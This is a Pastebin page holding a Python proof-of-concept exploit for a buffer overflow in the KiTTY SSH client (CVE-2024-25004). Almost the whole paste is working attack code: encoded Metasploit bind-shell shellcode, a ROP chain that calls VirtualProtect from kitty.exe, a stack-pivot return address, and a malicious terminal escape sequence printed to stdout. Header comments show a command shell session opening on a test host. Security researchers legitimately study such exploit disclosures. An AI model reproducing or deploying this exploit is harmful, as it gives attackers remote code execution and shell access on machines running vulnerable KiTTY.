API tools faq
paste
Advertisement
FlyFar

KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow - CVE-2024-25004

FlyFar
Mar 14th, 2024
917
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.68 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
  2. # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
  3. # Vendor Homepage: https://github.com/cyd01/KiTTY/=
  4. # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
  5. # Version: ≤ 0.76.1.13
  6. # Tested on: Microsoft Windows 11/10/8/7/XP
  7. # CVE: CVE-2024-25004
  8. #-------------------------------------------------------------------------------------#
  9. # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
  10. #-------------------------------------------------------------------------------------#
  11. # msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
  12. # [*] Payload Handler Started as Job 1                                                #
  13. # msf6 payload(windows/shell_bind_tcp) >                                              #
  14. # [*] Started bind TCP handler against 192.168.100.28:4444                            #
  15. # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   #
  16. #-------------------------------------------------------------------------------------#
  17.  
  18. import sys
  19. import os
  20. import struct
  21.  
  22. #-------------------------------------------------------------------------------------#
  23. # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
  24. # windows/shell_bind_tcp - 355 bytes                                                  #
  25. # https://metasploit.com/                                                             #
  26. # Encoder: x86/shikata_ga_nai                                                         #
  27. # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
  28. # PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
  29. # AutoVerifySession=true                                                              #
  30. #-------------------------------------------------------------------------------------#
  31.  
  32. buf =  b""
  33. buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
  34. buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
  35. buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
  36. buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
  37. buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
  38. buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
  39. buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
  40. buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
  41. buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
  42. buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
  43. buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
  44. buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
  45. buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
  46. buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
  47. buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
  48. buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
  49. buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
  50. buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
  51. buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
  52. buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
  53. buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
  54. buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
  55. buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
  56. buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
  57. buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
  58. buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
  59. buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
  60. buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
  61. buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
  62. buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
  63.  
  64.  
  65. def shellcode():
  66.     sc = b''
  67.     sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
  68.     sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
  69.     sc += b'\x29\xD8'             # sub    eax,ebx
  70.     sc += b'\x29\xC4'             # sub    esp,eax
  71.     sc += buf
  72.     sc += b'\x90' * (1042-len(sc))
  73.     assert len(sc) == 1042
  74.     return sc
  75.  
  76.  
  77. def create_rop_chain():
  78.     # rop chain generated with mona.py - www.corelan.be
  79.     rop_gadgets = [
  80.     #[---INFO:gadgets_to_set_esi:---]
  81.     0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
  82.     0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
  83.     0x41414141,  # Filler (compensate)
  84.     0x41414141,  # Filler (compensate)
  85.     0x41414141,  # Filler (compensate)
  86.     0x41414141,  # Filler (compensate)
  87.     0x41414141,  # Filler (compensate)
  88.     0x41414141,  # Filler (compensate)
  89.     0x41414141,  # Filler (compensate)
  90.     0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
  91.     0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
  92.     #[---INFO:gadgets_to_set_ebp:---]
  93.     0x00429953,  # POP EBP # RETN [kitty.exe]
  94.     0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
  95.     #[---INFO:gadgets_to_set_ebx:---]
  96.     0x0049d9f9,  # POP EBX # RETN [kitty.exe]
  97.     0x00000201,  # 0x00000201-> ebx
  98.     #[---INFO:gadgets_to_set_edx:---]
  99.     0x00430dce,  # POP EDX # RETN [kitty.exe]
  100.     0x00000040,  # 0x00000040-> edx
  101.     #[---INFO:gadgets_to_set_ecx:---]
  102.     0x005ac58c,  # POP ECX # RETN [kitty.exe]
  103.     0x004d81d9,  # &Writable location [kitty.exe]
  104.     #[---INFO:gadgets_to_set_edi:---]
  105.     0x004fa404,  # POP EDI # RETN [kitty.exe]
  106.     0x005a2001,  # RETN (ROP NOP) [kitty.exe]
  107.     #[---INFO:gadgets_to_set_eax:---]
  108.     0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
  109.     0x90909090,  # nop
  110.     0x41414141,  # Filler (compensate)
  111.     #[---INFO:pushad:---]
  112.     0x005dfbac,  # PUSHAD # RETN [kitty.exe]
  113.     ]
  114.     return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
  115.  
  116. rop_chain = create_rop_chain()
  117.  
  118.  
  119. #----------------------------------------------------------------------------------#
  120. # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d                                           #
  121. # Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                   #
  122. #   ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
  123. #   ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}                      #
  124. # Shellcode size at ESP: 1042 bytes                                                #
  125. #----------------------------------------------------------------------------------#
  126.  
  127. return_address = struct.pack('<I',  0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}
  128.  
  129. rop_chain_padding = b'\x90' * 27
  130. nops = b'\x90' * 88
  131.  
  132. escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
  133. escape_sequence += rop_chain_padding + rop_chain
  134. escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
  135. escape_sequence += nops + b'\007'
  136.  
  137. stdout = os.fdopen(sys.stdout.fileno(), 'wb')
  138. stdout.write(escape_sequence)
  139. stdout.flush()
  140.            
Tags: buffer overflow Exploit CVE Vulnerability Username kitty Overflow buffer
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!